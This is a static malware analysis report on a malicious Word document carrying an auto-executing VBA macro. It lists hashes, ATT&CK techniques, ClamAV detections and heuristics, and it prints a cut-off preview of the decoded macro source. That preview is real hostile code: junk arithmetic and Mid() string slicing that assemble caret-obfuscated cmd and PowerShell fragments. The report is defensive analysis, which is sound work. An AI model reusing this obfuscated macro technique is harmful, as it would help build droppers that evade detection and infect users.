Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9f84428908f16511…

MALICIOUS

Office (OLE)

221.0 KB Created: 2018-02-06 15:54:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: a2f2167e0eae1a6f8406b1d8dc21d464 SHA-1: 54ce0c1cc770384d0e451b87a15603b823a04546 SHA-256: 9f84428908f16511529c2589a917e7f53b3568cd7a7832d966cf06333bb26bcb
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro uses the Shell() function, a critical heuristic firing, indicating an attempt to execute arbitrary commands. This is further supported by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic, which flags auto-execution combined with execution tokens. The ClamAV detections 'Img.Dropper.PhishingLure-6443153-0' and 'Doc.Trojan.Obfuscated-6443078-0' confirm its malicious nature, suggesting it acts as a dropper for other malware.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 80504 bytes
SHA-256: d90155808ced037f6784b3c18ab2723cfb188f5bd1544cdbc72e1f0bbc582ee5
Detection
ClamAV: Doc.Trojan.Obfuscated-6443078-0
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iwlQGUsNRYV"
Function NpYmCPnj()
On Error Resume Next
wXqrIlbTwzH = ("dbFrvOZsqtYQzIcpHiUuHpNnAScfaFHa")
JDiQDYt = 3901150 - Sqr(PIVZCXZCPH * Fix(iRZtXYLi) + 2575741 / wAOpXqrBvOGSXV) - 193789 * knTLTHw * sZfizrZzG + CDbl(4469393 * Int(3374510) / 1548307 * Tan(1258663)) / ijhBUtFPtDsS / CByte(7658098 - CDbl(KCfqCvwwLM))
wrVGHtL = 392228 - Sqr(pJLADsw * Fix(ImdSnFN) + 5611619 / bljEAmEraGK) - 7566441 * VVzQDwDtAzT * PXYNDwhTSjaVz + CDbl(7872812 * Int(4321388) / 1352029 * Tan(1748112)) / mnNcRISWCRZ / CByte(7473941 - CDbl(mMRlPjdWJdT))
ZjWKVC = Mid(wXqrIlbTwzH, 19, 10)
VoWPWzqS = ("BdwifswrzhuwnHcw%=o^we^ruEGTCcS")
LRMvpKfV = 3173662 - Sqr(zUjCGTVdZ * Fix(wnpKLajM) + 5296960 / JoIFZrts) - 1024362 * KHAWYMrXwn * czKiRZRf + CDbl(6015003 * Int(2787467) / 9725554 * Tan(4173306)) / DJLbdPZ / CByte(5696643 - CDbl(EwrmTmziLP))
CvFrX = 7665064 - Sqr(hpwaHRb * Fix(aGMlzSOA) + 3128647 / hNdEvNniGfjwDi) - 6508242 * WUNAVzwRzzjFpB * wSQiaccukn + CDbl(5687520 * Int(2156340) / 9211620 * Tan(6105600)) / DdDzvunPYjP / CByte(2291249 - CDbl(zdhoFIhi))
XOfKzCz = Mid(VoWPWzqS, 15, 10)
cAPbjQCY = ("HnjEwljLVvfGHh%=p&&set %YLtiJsiIBWvimjzpUAsvDD")
uFDkNMjzw = 6775563 - Sqr(jaqGHbWWawbcq * Fix(zdQzmQatZnuXV) + 5621436 / AzMpkmfNaHLz) - 1191711 * HjcQMBh * ADSTqBCLkGtn + CDbl(5072756 * Int(9946815) / 2829255 * Tan(7357068)) / CSQqqbRT / CByte(8125408 - CDbl(ESGJbBPzJ))
qPKKMcFtcSk = 4426253 - Sqr(vdKOWFFSc * Fix(UqKJjQuJ) + 5531482 / zAjztdz) - 3441630 * LAFPpHoFcTVL * NKkbwzr + CDbl(7109558 * Int(4009219) / 8030603 * Tan(6207837)) / RvtNVtHnfR / CByte(1325693 - CDbl(bUCvKSpGp))
kAGGDYnUvZn = Mid(cAPbjQCY, 12, 13)
MDmTPnopOkV = ("HJcMbLEQaNH%=DwEEILqvzjsWp")
Zzvhj = 9657470 - Sqr(mJKkDnlp * Fix(roaaHCoGkW) + 2808169 / zYsjTwZS) - 9696791 * jckQDtZoj * pwoSWhjjsI + CDbl(1312347 * Int(9277866) / 6849307 * Tan(9021513)) / lRDjrMWViFzpr / CByte(9724962 - CDbl(jwpsWwjaKmNqZq))
uBzhzXnfwv = 1189119 - Sqr(spaScWEpJTdKN * Fix(rrkwbKGrYr) + 312618 / swdVzfYRFzQfR) - 2050011 * AiDVZNmvVFaPw * BRjQmdILnVzl + CDbl(9143964 * Int(3661145) / 8444850 * Tan(5224299)) / hQSGIUV / CByte(5421918 - CDbl(GBHQWQckDij))
nwNHCmtczlT = Mid(MDmTPnopOkV, 9, 5)
YLSwHizB = ("tsJwhJwzc              XzfzdNTTiLiJAGjEwzspd")
tjjPJq = 1662649 - Sqr(QKAEYbPfYF * Fix(qEIKDjFMDkBD) + 206982 / aCZYaVtOKZT) - 1232773 * UYwMrpbpFHquAC * FmPGzZzZpGz + CDbl(7056849 * Int(7711179) / 5346766 * Tan(8890088)) / qzjkoGYJOZpV / CByte(9057843 - CDbl(iaSPJYJNGaWz))
BXoaH = 1283658 - Sqr(tEnNKYA * Fix(QSpwNFsajciGcX) + 3546893 / SVZdqJOpAS) - 3236150 * mcKWjhJA * KKEVjquVAc + CDbl(4129447 * Int(7309616) / 2774208 * Tan(8993175)) / zXGHEAwvohoGR / CByte(1447479 - CDbl(vOSzHLVIKS))
dizRzdh = Mid(YLSwHizB, 10, 14)
hBpVwzBFD = ("ulvfcndJSkSaNMRjitEtvamz=^he^l^l&&set VErpT")
lVEEpiS = 1097714 - Sqr(YczFFHiEqNpwKh * Fix(mjrqYJdDvtGU) + 619019 / VDAHSUmM) - 3228973 * TjcmFXwnGK * oCnhjvYBMwmauV + CDbl(1916585 * Int(7874749) / 8297249 * Tan(8531760)) / uZTSWrhqz / CByte(4604296 - CDbl(TNsOhAMaiYNKEa))
NbXLbHFWs = 6346009 - Sqr(hRviFut * Fix(WVkRpCEbd) + 2914176 / ZijnJcQKohO) - 2763134 * pmAYCprYUcrMQ * kjUmjpvHWAimGo + CDbl(7077232 * Int(1075525) / 6706735 * Tan(1443572)) / rcDCfZoX / CByte(1097721 - CDbl(Gobthjd))
hCJPO = Mid(hBpVwzBFD, 25, 14)
REBOJpF = ("wnnlIuwbLZDqmjiznczXOTwhRZITpUjB")
lcaHNpTi = 3117930 - Sqr(muXkNHtwrrHYb * Fix(BHhRuiLzAoZ) + 4392770 / ZwnGCKLRsbnzwO) - 6569997 * SAiicjTHwvlj * uiKqITCElENQM + CDbl(1627227 * Int(6125031) / 8825598 * Tan(3619199)) / QdQhnqsWqcfHGZ / CByte(5954376 - CDbl(wtcIoufchwV))
wwSHvjSRp = 2694766 - Sqr(anNjwVCXM * Fix(UwmdZYdzoljJmR) + 2004704 / VzoArViF) - 2998920 * SbIEcElzIKCRG * DwhcjRB + CDbl(9368245 * Int(4181731) / 8055762 * Tan(9919517)) / jMDwTjN / CByte(7138529 - CDbl(CpjJfXo))
HwdzqbZbv = Mid(REBOJpF, 4, 10)
cwKTwh
... (truncated)